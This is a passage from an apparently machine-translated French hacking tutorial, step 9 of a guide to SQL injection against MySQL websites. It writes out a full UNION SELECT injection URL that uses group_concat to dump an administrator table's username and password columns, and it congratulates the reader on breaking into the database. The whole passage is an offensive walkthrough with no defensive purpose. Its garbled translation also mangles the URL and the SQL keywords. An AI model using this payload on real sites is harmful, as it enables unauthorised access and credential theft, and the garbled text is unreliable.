Étape 9: Trouver de l’administrateur nom d’utilisateur et mot de passe - partie 2
Une fois que vous tapé dans * Username_Column *, 0x20616e6420, * Password_Column * entre les supports de group_concat ,
Il faut maintenant ajouter le nom de Table d’hôte .
Après la commande de , tapez votre nom de Admin Table que vous avez obtenu à l’étape 5. (Dans mon cas, le nom de My Admin Table est nifty_admin)
Assurez-vous que vous tapez le nom de la Table de l’Admin en anglais,Pas de caractères hexadécimaux.
Maintenant l’adresse Web complète enfin ressemble à ceci :
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1, group_concat (* Username_Column *, 0x20616e6420, * Password_Column *), 3,4,5,6,7,8 de * Admin_Table_Name *
Assurez-vous vous remplacez * Admin_Table_Name * avec votre nom de Table Admin avec * Username_Column *, * Password_Column *
Si vous appuyez sur entrée, vous pourrez voir le nom d’utilisateur et mot de passe comme la photo ci-dessus, Remarque : Le nom d’utilisateur et mot de passe vous voyez ci-dessus sont DÉPASSÉS, ils ne travailleront pas.
Félicitations ! Vous avez piraté avec succès dans la base de données MySQL !